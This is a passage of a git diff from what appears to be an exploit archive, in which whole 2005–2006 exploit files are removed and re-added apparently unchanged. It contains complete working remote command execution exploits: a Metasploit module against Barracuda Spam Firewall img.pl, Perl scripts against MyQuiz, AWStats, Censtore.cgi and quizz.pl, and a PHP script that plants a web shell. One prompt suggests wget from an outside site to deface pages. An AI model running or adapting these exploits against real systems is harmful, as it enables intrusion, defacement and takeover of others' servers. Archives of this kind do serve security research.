+++ b/platforms/cgi/webapps/1040.c
@@ -86,6 +86,6 @@ printf("Sending H3ll Packets...\n"); closesocket(sock); return 0; -} - -// milw0rm.com [2005-06-11] +} + +// milw0rm.com [2005-06-11]
diff --git a/platforms/cgi/webapps/1041.pl b/platforms/cgi/webapps/1041.pl
index 82ccde7cd..18b22637e 100755
--- a/platforms/cgi/webapps/1041.pl
+++ b/platforms/cgi/webapps/1041.pl
@@ -119,6 +119,6 @@ print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\n"; print "If connect back shell not found:\n"; print "- you do not have privileges to write in /tmp\n"; print "- Shell not vulnerable\n\n\n"; -print "We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk\n\n\n"; - -# milw0rm.com [2005-06-11] +print "We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk\n\n\n"; + +# milw0rm.com [2005-06-11] diff --git a/platforms/cgi/webapps/1048.pl b/platforms/cgi/webapps/1048.pl index 3b7116dbb..3af16fece 100755 --- a/platforms/cgi/webapps/1048.pl +++ b/platforms/cgi/webapps/1048.pl @@ -69,6 +69,6 @@ print $socket "Pragma: no-cache\n"; print $socket "Cache-Control: no-cache\n"; print $socket "Connection: close\n\n"; -print "have nice shell..."; - -# milw0rm.com [2005-06-15] +print "have nice shell..."; + +# milw0rm.com [2005-06-15] diff --git a/platforms/cgi/webapps/1120.pl b/platforms/cgi/webapps/1120.pl index 7147f9d0b..050ef2872 100755 --- a/platforms/cgi/webapps/1120.pl +++ b/platforms/cgi/webapps/1120.pl @@ -124,6 +124,6 @@ elsif($opt eq "upload") { &upload_file($lfile); } - print "done.\n"; - -# milw0rm.com [2005-07-25] + print "done.\n"; + +# milw0rm.com [2005-07-25] diff --git a/platforms/cgi/webapps/1194.c b/platforms/cgi/webapps/1194.c index a9abc484e..bf7f1ce80 100755 --- a/platforms/cgi/webapps/1194.c +++ b/platforms/cgi/webapps/1194.c @@ -148,6 +148,6 @@ printf("\n\n"); close(sock); return 0; - } - -// milw0rm.com [2005-09-04] + } + +// milw0rm.com [2005-09-04] diff --git a/platforms/cgi/webapps/1236.pm b/platforms/cgi/webapps/1236.pm index bb32aa750..3f7d292cf 100755 --- a/platforms/cgi/webapps/1236.pm +++ b/platforms/cgi/webapps/1236.pm 
@@ -1,189 +1,189 @@ -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::barracuda_img_exec; -use base "Msf::Exploit"; -use strict; -use Pex::Text; -use bytes; - -my $advanced = { }; - -my $info = { - 'Name' => 'Barracuda IMG.PL Remote Command Execution', - 'Version' => '$Revision: 1.0 $', - 'Authors' => [ 'Nicolas Gregoire ' ], - 'Arch' => [ 'x86' ], - 'OS' => [ 'linux' ], - 'Priv' => 0, - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 8000], - 'VHOST' => [0, 'DATA', 'The virtual host name of the server'], - 'IMG' => [1, 'DATA', 'Full path of img.pl script', '/cgi-bin/img.pl'], - 'SSL' => [0, 'BOOL', 'Use SSL'], - }, - - 'Description' => Pex::Text::Freeform(qq{ - This module exploits an arbitrary command execution vulnerability in the - Barracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable. -}), - - 'Refs' => - [ - ['URL', 'http://www.securiweb.net/wiki/Ressources/AvisDeSecurite/2005.1'], - ['CVE', '2005-2847'], - ['OSVDB', '19279'], - ['BID', '14712'], - ['NSS', '19556'], - ], - - 'Payload' => - { - 'Space' => 512, - 'Keys' => ['cmd'], - }, - - 'Keys' => ['barracuda'], - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Check { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $vhost = $self->VHost; - my $target_port = $self->GetVar('RPORT'); - my $img = $self->GetVar('IMG'); - - my $request = - "GET $img?f=%2e%2e/etc/hosts HTTP/1.1\r\n". - "Accept: */*\r\n". - "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n". 
- "Host: $vhost:$target_port\r\n". - "Connection: Close\r\n". - "\r\n"; - - my $s = Msf::Socket::Tcp->new( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'SSL' => $self->GetVar('SSL'), - ); - - if ($s->IsError){ - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return $self->CheckCode('Connect'); - } - - $self->PrintLine("[*] Establishing a connection to the target..."); - - $s->Send($request); - my $results = $s->Recv(-1, 20); - $s->Close(); - - if (($results =~ /HTTP\/1\..\s+200/) && ($results =~/127\.0\.0\.1/)) { - - $self->PrintLine("[*] Vulnerable server detected!"); - return $self->CheckCode('Confirmed'); - - } elsif ($results =~ /HTTP\/1\..\s+([345]\d+)/) { - - $self->PrintLine("[*] The Barraccuda application was not found."); - return $self->CheckCode('Safe'); - } - - $self->PrintLine("[*] Generic error..."); - return $self->CheckCode('Generic'); -} - -sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $vhost = $self->VHost; - my $target_port = $self->GetVar('RPORT'); - my $img = $self->GetVar('IMG'); - my $encodedPayload = $self->GetVar('EncodedPayload'); - my $cmd = $encodedPayload->RawPayload; - - $img = $img."?f=".$self->URLEncode(qq#../bin/sh -c "echo 'YYY';#. $cmd .qq#;echo 'YYY'"|#); - - my $request = - "GET $img HTTP/1.1\r\n". - "Accept: */*\r\n". - "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n". - "Host: $vhost:$target_port\r\n". - "Connection: Close\r\n". - "\r\n"; - - my $s = Msf::Socket::Tcp->new( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'SSL' => $self->GetVar('SSL'), - ); - - if ($s->IsError){ - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - $self->PrintLine("[*] Establishing a connection to the target..."); - $s->Send($request); - my $results = $s->Recv(-1, 20); - - if ($results =~ /HTTP\/1\.. 
200 OK/im) { - - (undef, $results) = split(/YYY/, $results); - - $self->PrintLine(' '); - $self->PrintLine("$results"); - $self->PrintLine(' '); - - $self->PrintLine("[*] End of data."); - - } else { - $self->PrintLine(' '); - $self->PrintLine("Doh ! Are you sure this server is vulnerable ?"); - } - - $s->Close(); - return; -} - -sub URLEncode { - my $self = shift; - my $data = shift; - my $res; - - foreach my $c (unpack('C*', $data)) { - if ( - ($c >= 0x30 && $c <= 0x39) || - ($c >= 0x41 && $c <= 0x5A) || - ($c >= 0x61 && $c <= 0x7A) - ) { - $res .= chr($c); - } else { - $res .= sprintf("%%%.2x", $c); - } - } - return $res; -} - -sub VHost { - my $self = shift; - my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST'); - return $name; -} - -1; - -# milw0rm.com [2005-09-27] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. +## + +package Msf::Exploit::barracuda_img_exec; +use base "Msf::Exploit"; +use strict; +use Pex::Text; +use bytes; + +my $advanced = { }; + +my $info = { + 'Name' => 'Barracuda IMG.PL Remote Command Execution', + 'Version' => '$Revision: 1.0 $', + 'Authors' => [ 'Nicolas Gregoire ' ], + 'Arch' => [ 'x86' ], + 'OS' => [ 'linux' ], + 'Priv' => 0, + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The target port', 8000], + 'VHOST' => [0, 'DATA', 'The virtual host name of the server'], + 'IMG' => [1, 'DATA', 'Full path of img.pl script', '/cgi-bin/img.pl'], + 'SSL' => [0, 'BOOL', 'Use SSL'], + }, + + 'Description' => Pex::Text::Freeform(qq{ + This module exploits an arbitrary command execution vulnerability in the + Barracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable. 
+}), + + 'Refs' => + [ + ['URL', 'http://www.securiweb.net/wiki/Ressources/AvisDeSecurite/2005.1'], + ['CVE', '2005-2847'], + ['OSVDB', '19279'], + ['BID', '14712'], + ['NSS', '19556'], + ], + + 'Payload' => + { + 'Space' => 512, + 'Keys' => ['cmd'], + }, + + 'Keys' => ['barracuda'], + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Check { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $vhost = $self->VHost; + my $target_port = $self->GetVar('RPORT'); + my $img = $self->GetVar('IMG'); + + my $request = + "GET $img?f=%2e%2e/etc/hosts HTTP/1.1\r\n". + "Accept: */*\r\n". + "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n". + "Host: $vhost:$target_port\r\n". + "Connection: Close\r\n". + "\r\n"; + + my $s = Msf::Socket::Tcp->new( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'SSL' => $self->GetVar('SSL'), + ); + + if ($s->IsError){ + $self->PrintLine('[*] Error creating socket: ' . 
$s->GetError); + return $self->CheckCode('Connect'); + } + + $self->PrintLine("[*] Establishing a connection to the target..."); + + $s->Send($request); + my $results = $s->Recv(-1, 20); + $s->Close(); + + if (($results =~ /HTTP\/1\..\s+200/) && ($results =~/127\.0\.0\.1/)) { + + $self->PrintLine("[*] Vulnerable server detected!"); + return $self->CheckCode('Confirmed'); + + } elsif ($results =~ /HTTP\/1\..\s+([345]\d+)/) { + + $self->PrintLine("[*] The Barraccuda application was not found."); + return $self->CheckCode('Safe'); + } + + $self->PrintLine("[*] Generic error..."); + return $self->CheckCode('Generic'); +} + +sub Exploit { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $vhost = $self->VHost; + my $target_port = $self->GetVar('RPORT'); + my $img = $self->GetVar('IMG'); + my $encodedPayload = $self->GetVar('EncodedPayload'); + my $cmd = $encodedPayload->RawPayload; + + $img = $img."?f=".$self->URLEncode(qq#../bin/sh -c "echo 'YYY';#. $cmd .qq#;echo 'YYY'"|#); + + my $request = + "GET $img HTTP/1.1\r\n". + "Accept: */*\r\n". + "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n". + "Host: $vhost:$target_port\r\n". + "Connection: Close\r\n". + "\r\n"; + + my $s = Msf::Socket::Tcp->new( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'SSL' => $self->GetVar('SSL'), + ); + + if ($s->IsError){ + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return; + } + + $self->PrintLine("[*] Establishing a connection to the target..."); + $s->Send($request); + my $results = $s->Recv(-1, 20); + + if ($results =~ /HTTP\/1\.. 200 OK/im) { + + (undef, $results) = split(/YYY/, $results); + + $self->PrintLine(' '); + $self->PrintLine("$results"); + $self->PrintLine(' '); + + $self->PrintLine("[*] End of data."); + + } else { + $self->PrintLine(' '); + $self->PrintLine("Doh ! 
Are you sure this server is vulnerable ?"); + } + + $s->Close(); + return; +} + +sub URLEncode { + my $self = shift; + my $data = shift; + my $res; + + foreach my $c (unpack('C*', $data)) { + if ( + ($c >= 0x30 && $c <= 0x39) || + ($c >= 0x41 && $c <= 0x5A) || + ($c >= 0x61 && $c <= 0x7A) + ) { + $res .= chr($c); + } else { + $res .= sprintf("%%%.2x", $c); + } + } + return $res; +} + +sub VHost { + my $self = shift; + my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST'); + return $name; +} + +1; + +# milw0rm.com [2005-09-27] diff --git a/platforms/cgi/webapps/1471.pl b/platforms/cgi/webapps/1471.pl index 21bb0a4ee..2355fce91 100755 --- a/platforms/cgi/webapps/1471.pl +++ b/platforms/cgi/webapps/1471.pl 
@@ -1,39 +1,39 @@ -#!/usr/bin/perl -# => MyQuiz Remote Command Execution Exploit -# -> By Hessam-x / www.hackerz.ir -# manual exploiting --> http://[target]/cgi-bin/myquiz.pl/ask/;| -# SecurityFocus [bug] : http://www.securityfocus.com/archive/1/423921/30/0/threaded -# / | \_____ ____ | | __ ___________________ -#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / -#\ Y // __ \\ \___| <\ ___/| | \// / -# \___|_ /(____ /\___ >__|_ \\___ >__| /_____ \ -# \/ \/ \/ \/ \/ \/ -# Iran Hackerz Security Team -# Hessam-x : www.hessamx.net - -use LWP::Simple; - -print "-------------------------------------------\n"; -print "= MyQuiz Remote Command Execution Exploit =\n"; -print "= By Hessam-x - www.hackerz.ir =\n"; -print "-------------------------------------------\n\n"; - - - print "Target(www.example.com)\> "; - chomp($targ = ); - - print "path: (/cgi-bin/myquiz.pl/ask/)\>"; - chomp($path=); - - print "command: (wget www.hackerz.ir/deface.htm)\>"; - chomp($comd=); - - -$page=get("http://".$targ.$path) || die "[-] Unable to retrieve: $!"; -print "[+] Connected to: $targ\n"; -print "[~] Sending exploiting request,wait....\n"; -get("http://".$targ.$path.";".$comd."|") -print "[+] Exploiting request done!\n"; -print "Enjoy !"; - -# milw0rm.com [2006-02-06] +#!/usr/bin/perl +# => MyQuiz Remote Command Execution Exploit +# -> By Hessam-x / www.hackerz.ir +# manual exploiting --> http://[target]/cgi-bin/myquiz.pl/ask/;| +# SecurityFocus [bug] : http://www.securityfocus.com/archive/1/423921/30/0/threaded +# / | \_____ ____ | | __ ___________________ +#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / +#\ Y // __ \\ \___| <\ ___/| | \// / +# \___|_ /(____ /\___ >__|_ \\___ >__| /_____ \ +# \/ \/ \/ \/ \/ \/ +# Iran Hackerz Security Team +# Hessam-x : www.hessamx.net + +use LWP::Simple; + +print "-------------------------------------------\n"; +print "= MyQuiz Remote Command Execution Exploit =\n"; +print "= By Hessam-x - www.hackerz.ir =\n"; +print "-------------------------------------------\n\n"; + 
+ + print "Target(www.example.com)\> "; + chomp($targ = ); + + print "path: (/cgi-bin/myquiz.pl/ask/)\>"; + chomp($path=); + + print "command: (wget www.hackerz.ir/deface.htm)\>"; + chomp($comd=); + + +$page=get("http://".$targ.$path) || die "[-] Unable to retrieve: $!"; +print "[+] Connected to: $targ\n"; +print "[~] Sending exploiting request,wait....\n"; +get("http://".$targ.$path.";".$comd."|") +print "[+] Exploiting request done!\n"; +print "Enjoy !"; + +# milw0rm.com [2006-02-06] diff --git a/platforms/cgi/webapps/1508.pl b/platforms/cgi/webapps/1508.pl index b31849f70..b18409d50 100755 --- a/platforms/cgi/webapps/1508.pl +++ b/platforms/cgi/webapps/1508.pl 
@@ -1,86 +1,86 @@ -#!/usr/bin/perl - -## AWStats < 6.4 command execution exploit -## based on http://www.idefense.com/application/poi/display?id=290&type=vulnerabilities -## (c)oded by 1dt.w0lf -## 11.08.2005 -## RST/GHC -## http://rst.void.ru -## http://ghc.ru - -## Note -## Exploitation will not occur until the stats page has been regenerated -## with the tainted referrer values from the http access log. -## AWStats is only vulnerable in situations where at least one URLPlugin is enabled. - - -use LWP::UserAgent; -use HTTP::Headers; - -if(@ARGV<1) { &usage; exit(0); } - -$path = $ARGV[0]; -header(); -print "Creating shell... Please wait\n"; - - $aw = LWP::UserAgent->new() or die; - $req = HTTP::Request->new(GET => $path); - $req->referer(qq[http://'.system(\$FilterEx{\'refererpages\'}).']); - $res = $aw->request($req); - - $aw = LWP::UserAgent->new() or die; - $res = $aw->get($path.'?output=refererpages&update=1'); - -while () - { - print "Type command for execute or 'q' for exit # "; - while() - { - $cmd=$_; - chomp($cmd); - exit() if ($cmd eq 'q'); - last; - } - &run($cmd); - } - -sub run() - { - $cmd2 = 'echo 1 && echo _START_ && '; - $cmd2 .= $cmd; - $cmd2 .= ' && echo _END_'; - $aw = LWP::UserAgent->new() or die; - $res = $aw->post( - "$path", - { - "output" => "refererpages", - "refererpagesfilterex" => "$cmd2" - } - ); - @result = split(/\n/,$res->content); - $runned = 0; - $on = 0; - print "\n"; - for $res(@result) - { - if ($res =~ /^_END_/) { print "\n"; return 0; } - if ($on == 1) { print " $res\n"; } - if ($res =~ /^_START_/) { $on = 1; $runned = 1; } - } - print "Can't execute command\n" if !$runned; - } - -sub header() -{ - print "--* AWStats < 6.4 exploit by RST/GHC\n"; - print "--* keep it private, not for public\n"; -} - -sub usage() - { - header(); - print "usage : r57awstats.pl [path_to_awstats.pl]\n"; - print " e.g.: r57awstats.pl http://127.0.0.1/cgi-bin/awstats.pl\n"; - } - -# milw0rm.com [2006-02-17] +#!/usr/bin/perl + +## AWStats < 6.4 
command execution exploit +## based on http://www.idefense.com/application/poi/display?id=290&type=vulnerabilities +## (c)oded by 1dt.w0lf +## 11.08.2005 +## RST/GHC +## http://rst.void.ru +## http://ghc.ru + +## Note +## Exploitation will not occur until the stats page has been regenerated +## with the tainted referrer values from the http access log. +## AWStats is only vulnerable in situations where at least one URLPlugin is enabled. + + +use LWP::UserAgent; +use HTTP::Headers; + +if(@ARGV<1) { &usage; exit(0); } + +$path = $ARGV[0]; +header(); +print "Creating shell... Please wait\n"; + + $aw = LWP::UserAgent->new() or die; + $req = HTTP::Request->new(GET => $path); + $req->referer(qq[http://'.system(\$FilterEx{\'refererpages\'}).']); + $res = $aw->request($req); + + $aw = LWP::UserAgent->new() or die; + $res = $aw->get($path.'?output=refererpages&update=1'); + +while () + { + print "Type command for execute or 'q' for exit # "; + while() + { + $cmd=$_; + chomp($cmd); + exit() if ($cmd eq 'q'); + last; + } + &run($cmd); + } + +sub run() + { + $cmd2 = 'echo 1 && echo _START_ && '; + $cmd2 .= $cmd; + $cmd2 .= ' && echo _END_'; + $aw = LWP::UserAgent->new() or die; + $res = $aw->post( + "$path", + { + "output" => "refererpages", + "refererpagesfilterex" => "$cmd2" + } + ); + @result = split(/\n/,$res->content); + $runned = 0; + $on = 0; + print "\n"; + for $res(@result) + { + if ($res =~ /^_END_/) { print "\n"; return 0; } + if ($on == 1) { print " $res\n"; } + if ($res =~ /^_START_/) { $on = 1; $runned = 1; } + } + print "Can't execute command\n" if !$runned; + } + +sub header() +{ + print "--* AWStats < 6.4 exploit by RST/GHC\n"; + print "--* keep it private, not for public\n"; +} + +sub usage() + { + header(); + print "usage : r57awstats.pl [path_to_awstats.pl]\n"; + print " e.g.: r57awstats.pl http://127.0.0.1/cgi-bin/awstats.pl\n"; + } + +# milw0rm.com [2006-02-17] 
diff --git a/platforms/cgi/webapps/1669.pl b/platforms/cgi/webapps/1669.pl index 30612080c..c61db0873 100755 --- a/platforms/cgi/webapps/1669.pl +++ b/platforms/cgi/webapps/1669.pl @@ -1,44 +1,44 @@ -#!/usr/bin/perl -# -# Censtore.cgi exploit by FOX_MULDER (fox_mulder@abv.bg) -# -# Vulnerability foud by FOX_MULDER. -# -# This is the first exploit i release and the bug is not public so enjoy. -# Ask http://censtore.com/ what they think about it !!! -# -########################### - -use IO::Socket; -use LWP::Simple; - -sub Usage { -print STDERR "\nFOX_MULDER DID IT AGAIN !!!\n"; -print STDERR "Usage:\ncenex.pl \"cmd\"\n"; -exit; -} - -if (@ARGV < 3) -{ - Usage(); -} - - -$host = @ARGV[0]; -$path = @ARGV[1]; -$command = @ARGV[2]; -print "\n\n !!! ULTRA PRIVATE EDITION !!! \n\n"; -print "censtore.cgi Remote Command Execution Exploit by FOX_MULDER\n"; - -print "\n[+] Conecting to $host\n"; - -my $result = get("http://$host$path/censtore.cgi?page=|$command|"); - -if (defined $result) { -print $result; -} -else { -print "Error with request.\n"; -} - -# milw0rm.com [2006-04-13] +#!/usr/bin/perl +# +# Censtore.cgi exploit by FOX_MULDER (fox_mulder@abv.bg) +# +# Vulnerability foud by FOX_MULDER. +# +# This is the first exploit i release and the bug is not public so enjoy. +# Ask http://censtore.com/ what they think about it !!! +# +########################### + +use IO::Socket; +use LWP::Simple; + +sub Usage { +print STDERR "\nFOX_MULDER DID IT AGAIN !!!\n"; +print STDERR "Usage:\ncenex.pl \"cmd\"\n"; +exit; +} + +if (@ARGV < 3) +{ + Usage(); +} + + +$host = @ARGV[0]; +$path = @ARGV[1]; +$command = @ARGV[2]; +print "\n\n !!! ULTRA PRIVATE EDITION !!! \n\n"; +print "censtore.cgi Remote Command Execution Exploit by FOX_MULDER\n"; + +print "\n[+] Conecting to $host\n"; + +my $result = get("http://$host$path/censtore.cgi?page=|$command|"); + +if (defined $result) { +print $result; +} +else { +print "Error with request.\n"; +} + +# milw0rm.com [2006-04-13] 
diff --git a/platforms/cgi/webapps/1670.pl b/platforms/cgi/webapps/1670.pl index 74ca2fc9b..7cdf933bd 100755 --- a/platforms/cgi/webapps/1670.pl +++ b/platforms/cgi/webapps/1670.pl 
@@ -1,48 +1,48 @@ -#!/usr/bin/perl -# -# quizz.p exploit by FOX_MULDER (fox_mulder@abv.bg) -# -# Vulnerability foud by WBYTE. -# -# Born to be root !!! -# -# !!!!!!!!!!!!!!!THANKS to WBYTE !!!!!!!!!!!!!!!!! -# -# FACT:Wbyte doesn't sleeps , he waits !. -# 0day -#################################################################################### - -use IO::Socket; -use LWP::Simple; - -sub Usage { -print STDERR "\nFOX_MULDER DID IT AGAIN !!!\n"; -print STDERR "Usage:\nquiz.pl \"cmd\"\n"; -exit; -} - -if (@ARGV < 3) -{ - Usage(); -} - - -$host = @ARGV[0]; -$path = @ARGV[1]; -$command = @ARGV[2]; -print "\n\n !!! PRIVATE PRIVATE PRIVATE !!! \n\n"; -print "quizz.pl 0day Remote Command Execution Exploit by FOX_MULDER\n"; - -print "\n[+] Conecting to $host\n"; -print "\n[+] Injecting command . . .\n\n"; - -my $result = get("http://$host$path/quizz.pl/ask/;$command|"); - -if (defined $result) { -print "fox\@nasa# $result"; -} -else { -print "Error with request.\n"; -} - -# milw0rm.com [2006-04-13] +#!/usr/bin/perl +# +# quizz.p exploit by FOX_MULDER (fox_mulder@abv.bg) +# +# Vulnerability foud by WBYTE. +# +# Born to be root !!! +# +# !!!!!!!!!!!!!!!THANKS to WBYTE !!!!!!!!!!!!!!!!! +# +# FACT:Wbyte doesn't sleeps , he waits !. +# 0day +#################################################################################### + +use IO::Socket; +use LWP::Simple; + +sub Usage { +print STDERR "\nFOX_MULDER DID IT AGAIN !!!\n"; +print STDERR "Usage:\nquiz.pl \"cmd\"\n"; +exit; +} + +if (@ARGV < 3) +{ + Usage(); +} + + +$host = @ARGV[0]; +$path = @ARGV[1]; +$command = @ARGV[2]; +print "\n\n !!! PRIVATE PRIVATE PRIVATE !!! \n\n"; +print "quizz.pl 0day Remote Command Execution Exploit by FOX_MULDER\n"; + +print "\n[+] Conecting to $host\n"; +print "\n[+] Injecting command . . .\n\n"; + +my $result = get("http://$host$path/quizz.pl/ask/;$command|"); + +if (defined $result) { +print "fox\@nasa# $result"; +} +else { +print "Error with request.\n"; +} + +# milw0rm.com [2006-04-13] 
diff --git a/platforms/cgi/webapps/1677.php b/platforms/cgi/webapps/1677.php index 4a574bc42..c653fc0ed 100755 --- a/platforms/cgi/webapps/1677.php +++ b/platforms/cgi/webapps/1677.php 
@@ -1,146 +1,146 @@ -#!/usr/bin/php -q -d short_open_tag=on - 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1]; -$path=$argv[2]; -$cmd="";$port=80;$proxy=""; - -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} - -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -//step 1 -> retrieve application path -$packet ="GET ".$p."sysinfo.cgi?action=debugger HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -#echo quick_dump($packet); -sendpacketii($packet); -$temp=explode("name=\"pfad\" value=\"",$html); -$temp2=explode("\"",$temp[1]); -$pfad=$temp2[0]; -if ($pfad=='') {die("cannot retrieve document root...\r\n");} -echo "document root ->".$pfad."\r\n"; - - -//step 2 -> we don't see any output, so let's create a php shell, you know, I'm phpcentric -$temp=";echo \ > ".$pfad."/phpinfo.php"; -$temp=urlencode($temp); -$packet ="GET ".$p."sysinfo.cgi?action=systemdoc&name=".$temp." HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -#echo quick_dump($packet); -sendpacketii($packet); - -//step 3 -> launch commands -$packet ="GET /phpinfo.php?cmd=".urlencode($cmd)." HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -#echo quick_dump($packet); -sendpacketii($packet); -echo $html; -?> - -# milw0rm.com [2006-04-14] +#!/usr/bin/php -q -d short_open_tag=on + 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1]; +$path=$argv[2]; +$cmd="";$port=80;$proxy=""; + +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} + +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +//step 1 -> retrieve application path +$packet ="GET ".$p."sysinfo.cgi?action=debugger HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +#echo quick_dump($packet); +sendpacketii($packet); +$temp=explode("name=\"pfad\" value=\"",$html); +$temp2=explode("\"",$temp[1]); +$pfad=$temp2[0]; +if ($pfad=='') {die("cannot retrieve document root...\r\n");} +echo "document root ->".$pfad."\r\n"; + + +//step 2 -> we don't see any output, so let's create a php shell, you know, I'm phpcentric +$temp=";echo \ > ".$pfad."/phpinfo.php"; +$temp=urlencode($temp); +$packet ="GET ".$p."sysinfo.cgi?action=systemdoc&name=".$temp." HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +#echo quick_dump($packet); +sendpacketii($packet); + +//step 3 -> launch commands +$packet ="GET /phpinfo.php?cmd=".urlencode($cmd)." HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +#echo quick_dump($packet); +sendpacketii($packet); +echo $html; +?> + +# milw0rm.com [2006-04-14] 
diff --git a/platforms/cgi/webapps/1755.py b/platforms/cgi/webapps/1755.py index a76a0cf6e..e6a7cd545 100755 --- a/platforms/cgi/webapps/1755.py +++ b/platforms/cgi/webapps/1755.py 
